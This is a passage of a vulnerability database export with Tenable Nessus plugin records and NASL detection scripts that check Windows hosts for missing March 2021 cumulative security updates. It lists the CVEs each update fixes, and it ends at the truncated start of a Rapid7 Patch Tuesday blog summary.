\"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26900\",\n \"CVE-2021-26901\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000808\");\n script_xref(name:\"MSFT\", value:\"MS21-5000808\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134\");\n\n script_name(english:\"KB5000808: Windows 10 Version 1909 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000808.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090,\n CVE-2021-24095, CVE-2021-26860, CVE-2021-26862,\n CVE-2021-26863, CVE-2021-26864, CVE-2021-26865,\n CVE-2021-26866, CVE-2021-26868, CVE-2021-26870,\n CVE-2021-26871, CVE-2021-26872, CVE-2021-26873,\n CVE-2021-26874, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26880, CVE-2021-26882, CVE-2021-26885,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26900, CVE-2021-26901,\n CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26867, CVE-2021-26876, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000808-os-build-18363-1440-6989940a-252d-48f3-a2a7-a42bf19fa2c8\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c8c6d108\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000808.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000808'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'18363',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000808])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-23T06:47:57", "description": "The remote Windows host is missing security update 5000802.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090,\n CVE-2021-24095, CVE-2021-26860, CVE-2021-26862,\n CVE-2021-26863, CVE-2021-26864, CVE-2021-26865,\n CVE-2021-26866, CVE-2021-26868, CVE-2021-26870,\n CVE-2021-26871, CVE-2021-26872, CVE-2021-26873,\n CVE-2021-26874, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26880, CVE-2021-26882, CVE-2021-26885,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26900, CVE-2021-26901,\n CVE-2021-27070, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26867, CVE-2021-26876, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)", "edition": 10, "cvss3": {"score": 7.8, "vector": "AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "title": "KB5000802: Windows Security Update (March 2021)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-26901", "CVE-2021-1729", "CVE-2021-26861", "CVE-2021-26864", "CVE-2021-26869", "CVE-2021-26899", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26882", "CVE-2021-26866", "CVE-2021-27070", "CVE-2021-26411", "CVE-2021-26890", "CVE-2021-26881", "CVE-2021-26865", "CVE-2021-26885", "CVE-2021-26884", "CVE-2021-24095", "CVE-2021-26871", "CVE-2021-26867", "CVE-2021-26863", "CVE-2021-24090", "CVE-2021-24107", "CVE-2021-26870", "CVE-2021-26878", "CVE-2021-26862", "CVE-2021-26873", "CVE-2021-26898", "CVE-2021-26880", "CVE-2021-1640", "CVE-2021-26900", "CVE-2021-26868", "CVE-2021-27085", "CVE-2021-26879", "CVE-2021-26872", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26892", "CVE-2021-26891", "CVE-2021-26860", "CVE-2021-26876", "CVE-2021-27077"], "modified": "2021-03-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000802.NASL", "href": "https://www.tenable.com/plugins/nessus/147226", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147226);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/22\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24090\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26867\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26871\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26885\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26900\",\n \"CVE-2021-26901\",\n \"CVE-2021-27070\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000802\");\n script_xref(name:\"MSFT\", value:\"MS21-5000802\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134\");\n\n script_name(english:\"KB5000802: Windows Security Update (March 2021)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000802.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24090,\n CVE-2021-24095, CVE-2021-26860, CVE-2021-26862,\n CVE-2021-26863, CVE-2021-26864, CVE-2021-26865,\n CVE-2021-26866, CVE-2021-26868, CVE-2021-26870,\n CVE-2021-26871, CVE-2021-26872, CVE-2021-26873,\n CVE-2021-26874, CVE-2021-26875, CVE-2021-26878,\n CVE-2021-26880, CVE-2021-26882, CVE-2021-26885,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26900, CVE-2021-26901,\n CVE-2021-27070, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26867, CVE-2021-26876, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000802-os-builds-19041-867-and-19042-867-63552d64-fe44-4132-8813-ef56d3626e14\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?8437e591\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000802.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-24090\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000802'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19041',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000802])\n|| \n smb_check_rollup(os:'10',\n sp:0,\n os_build:'19042',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000802])\n\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-03-20T06:03:07", "description": "The remote Windows host is missing security update 5000822.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095,\n CVE-2021-26860, CVE-2021-26862, CVE-2021-26863,\n CVE-2021-26864, CVE-2021-26865, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26870, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26874, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26876, CVE-2021-26877, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-26893, CVE-2021-26894,\n CVE-2021-26895, CVE-2021-26897, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)", "edition": 7, "cvss3": {"score": 9.8, "vector": "AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2021-03-09T00:00:00", "title": "KB5000822: Windows 10 Version 1809 and Windows Server 2019 March 2021 Security Update", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2021-26901", "CVE-2021-1729", "CVE-2021-26861", "CVE-2021-26864", "CVE-2021-26893", "CVE-2021-26869", "CVE-2021-26899", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26882", "CVE-2021-26866", "CVE-2021-26411", "CVE-2021-26890", "CVE-2021-26881", "CVE-2021-26865", "CVE-2021-26884", "CVE-2021-26897", "CVE-2021-24095", "CVE-2021-26863", "CVE-2021-24107", "CVE-2021-26870", "CVE-2021-26878", "CVE-2021-26862", "CVE-2021-26873", "CVE-2021-26898", "CVE-2021-26880", "CVE-2021-1640", "CVE-2021-26868", "CVE-2021-27085", "CVE-2021-26896", "CVE-2021-26879", "CVE-2021-26872", "CVE-2021-26877", "CVE-2021-26886", "CVE-2021-26889", "CVE-2021-26892", "CVE-2021-26891", "CVE-2021-26860", "CVE-2021-26895", "CVE-2021-26876", "CVE-2021-27063", "CVE-2021-26894", "CVE-2021-27077"], "modified": "2021-03-09T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS21_MAR_5000822.NASL", "href": "https://www.tenable.com/plugins/nessus/147223", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from the Microsoft Security Updates API. The text\n# itself is copyright (C) Microsoft Corporation.\n#\n\ninclude('compat.inc');\n\nif (description)\n{\n script_id(147223);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/03/19\");\n\n script_cve_id(\n \"CVE-2021-1640\",\n \"CVE-2021-1729\",\n \"CVE-2021-24095\",\n \"CVE-2021-24107\",\n \"CVE-2021-26411\",\n \"CVE-2021-26860\",\n \"CVE-2021-26861\",\n \"CVE-2021-26862\",\n \"CVE-2021-26863\",\n \"CVE-2021-26864\",\n \"CVE-2021-26865\",\n \"CVE-2021-26866\",\n \"CVE-2021-26868\",\n \"CVE-2021-26869\",\n \"CVE-2021-26870\",\n \"CVE-2021-26872\",\n \"CVE-2021-26873\",\n \"CVE-2021-26874\",\n \"CVE-2021-26875\",\n \"CVE-2021-26876\",\n \"CVE-2021-26877\",\n \"CVE-2021-26878\",\n \"CVE-2021-26879\",\n \"CVE-2021-26880\",\n \"CVE-2021-26881\",\n \"CVE-2021-26882\",\n \"CVE-2021-26884\",\n \"CVE-2021-26886\",\n \"CVE-2021-26889\",\n \"CVE-2021-26890\",\n \"CVE-2021-26891\",\n \"CVE-2021-26892\",\n \"CVE-2021-26893\",\n \"CVE-2021-26894\",\n \"CVE-2021-26895\",\n \"CVE-2021-26896\",\n \"CVE-2021-26897\",\n \"CVE-2021-26898\",\n \"CVE-2021-26899\",\n \"CVE-2021-26901\",\n \"CVE-2021-27063\",\n \"CVE-2021-27077\",\n \"CVE-2021-27085\"\n );\n script_xref(name:\"MSKB\", value:\"5000822\");\n script_xref(name:\"MSFT\", value:\"MS21-5000822\");\n script_xref(name:\"IAVA\", value:\"2021-A-0129\");\n script_xref(name:\"IAVA\", value:\"2021-A-0130\");\n script_xref(name:\"IAVA\", value:\"2021-A-0131\");\n script_xref(name:\"IAVA\", value:\"2021-A-0134\");\n\n script_name(english:\"KB5000822: Windows 10 Version 1809 and Windows Server 2019 March 2021 Security Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows host is missing security update 5000822.\nIt is, therefore, affected by multiple vulnerabilities :\n\n - An elevation of privilege vulnerability. An attacker can\n exploit this to gain elevated privileges.\n (CVE-2021-1640, CVE-2021-1729, CVE-2021-24095,\n CVE-2021-26860, CVE-2021-26862, CVE-2021-26863,\n CVE-2021-26864, CVE-2021-26865, CVE-2021-26866,\n CVE-2021-26868, CVE-2021-26870, CVE-2021-26872,\n CVE-2021-26873, CVE-2021-26874, CVE-2021-26875,\n CVE-2021-26878, CVE-2021-26880, CVE-2021-26882,\n CVE-2021-26889, CVE-2021-26891, CVE-2021-26898,\n CVE-2021-26899, CVE-2021-26901, CVE-2021-27077)\n\n - An information disclosure vulnerability. An attacker can\n exploit this to disclose potentially sensitive\n information. (CVE-2021-24107, CVE-2021-26869,\n CVE-2021-26884)\n\n - An memory corruption vulnerability exists. An attacker\n can exploit this to corrupt the memory and cause\n unexpected behaviors within the system/application.\n (CVE-2021-26411)\n\n - A remote code execution vulnerability. An attacker can\n exploit this to bypass authentication and execute\n unauthorized arbitrary commands. (CVE-2021-26861,\n CVE-2021-26876, CVE-2021-26877, CVE-2021-26881,\n CVE-2021-26890, CVE-2021-26893, CVE-2021-26894,\n CVE-2021-26895, CVE-2021-26897, CVE-2021-27085)\n\n - A denial of service (DoS) vulnerability. An attacker can\n exploit this issue to cause the affected component to\n deny system or application services. (CVE-2021-26879,\n CVE-2021-26886, CVE-2021-26896, CVE-2021-27063)\n\n - A security feature bypass vulnerability exists. An\n attacker can exploit this and bypass the security\n feature and perform unauthorized actions compromising\n the integrity of the system/application.\n (CVE-2021-26892)\");\n # https://support.microsoft.com/en-us/topic/march-9-2021-kb5000822-os-build-17763-1817-2eb6197f-e3b1-4f42-ab51-84345e063564\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1b432623\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Cumulative Update KB5000822.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2021-26861\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2021/03/08\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2021/03/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude('smb_func.inc');\ninclude('smb_hotfixes.inc');\ninclude('smb_hotfixes_fcheck.inc');\ninclude('smb_reg_query.inc');\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS21-03';\nkbs = make_list(\n '5000822'\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit('SMB/Registry/Enumerated');\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n smb_check_rollup(os:'10',\n sp:0,\n os_build:'17763',\n rollup_date:'03_2021',\n bulletin:bulletin,\n rollup_kb_list:[5000822])\n)\n{\n replace_kb_item(name:'SMB/Missing/'+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-03-13T12:49:58", "bulletinFamily": "info", "cvelist": ["CVE-2020-27844", "CVE-2021-1640", "CVE-2021-1729", "CVE-2021-21159", "CVE-2021-21160", "CVE-2021-21161", "CVE-2021-21162", "CVE-2021-21163", "CVE-2021-21164", "CVE-2021-21165", "CVE-2021-21166", "CVE-2021-21167", "CVE-2021-21168", "CVE-2021-21169", "CVE-2021-21170", "CVE-2021-21171", "CVE-2021-21172", "CVE-2021-21173", "CVE-2021-21174", "CVE-2021-21175", "CVE-2021-21176", "CVE-2021-21177", "CVE-2021-21178", "CVE-2021-21179", "CVE-2021-21180", "CVE-2021-21181", "CVE-2021-21182", "CVE-2021-21183", "CVE-2021-21184", "CVE-2021-21185", "CVE-2021-21186", "CVE-2021-21187", "CVE-2021-21188", "CVE-2021-21189", "CVE-2021-21190", "CVE-2021-21300", "CVE-2021-24089", "CVE-2021-24090", "CVE-2021-24095", "CVE-2021-24104", "CVE-2021-24107", "CVE-2021-24108", "CVE-2021-24110", "CVE-2021-26411", "CVE-2021-26412", "CVE-2021-26854", "CVE-2021-26855", "CVE-2021-26857", "CVE-2021-26858", "CVE-2021-26859", "CVE-2021-26860", "CVE-2021-26861", "CVE-2021-26862", "CVE-2021-26863", "CVE-2021-26864", "CVE-2021-26865", "CVE-2021-26866", "CVE-2021-26867", "CVE-2021-26868", "CVE-2021-26869", "CVE-2021-26870", "CVE-2021-26871", "CVE-2021-26872", "CVE-2021-26873", "CVE-2021-26874", "CVE-2021-26875", "CVE-2021-26876", "CVE-2021-26877", "CVE-2021-26878", "CVE-2021-26879", "CVE-2021-26880", "CVE-2021-26881", "CVE-2021-26882", "CVE-2021-26884", "CVE-2021-26885", "CVE-2021-26886", "CVE-2021-26887", "CVE-2021-26889", "CVE-2021-26890", "CVE-2021-26891", "CVE-2021-26892", "CVE-2021-26893", "CVE-2021-26894", "CVE-2021-26895", "CVE-2021-26896", "CVE-2021-26897", "CVE-2021-26898", "CVE-2021-26899", "CVE-2021-26900", "CVE-2021-26901", "CVE-2021-26902", "CVE-2021-27047", "CVE-2021-27048", "CVE-2021-27049", "CVE-2021-27050", "CVE-2021-27051", "CVE-2021-27052", "CVE-2021-27053", "CVE-2021-27054", "CVE-2021-27055", "CVE-2021-27056", "CVE-2021-27057", "CVE-2021-27058", "CVE-2021-27059", "CVE-2021-27060", "CVE-2021-27061", "CVE-2021-27062", "CVE-2021-27063", "CVE-2021-27065", "CVE-2021-27066", "CVE-2021-27070", "CVE-2021-27074", "CVE-2021-27075", "CVE-2021-27076", "CVE-2021-27077", "CVE-2021-27078", "CVE-2021-27080", "CVE-2021-27081", "CVE-2021-27082", "CVE-2021-27083", "CVE-2021-27084", "CVE-2021-27085"], "description": "\n\nAnother Patch Tuesday ([2021-Mar](<https://msrc.microsoft.com/update-guide/releaseNote/2021-Mar>)) is upon us and with this month comes a whopping 122 CVEs. As usual Windows tops the list of the most patched product. However, this month it\u2019s browser vulnerabilities taking the second place, outnumbering Office vulnerabilities 3:1! Lastly, the Exchange Server vulnerabilities this month are not to be ignored 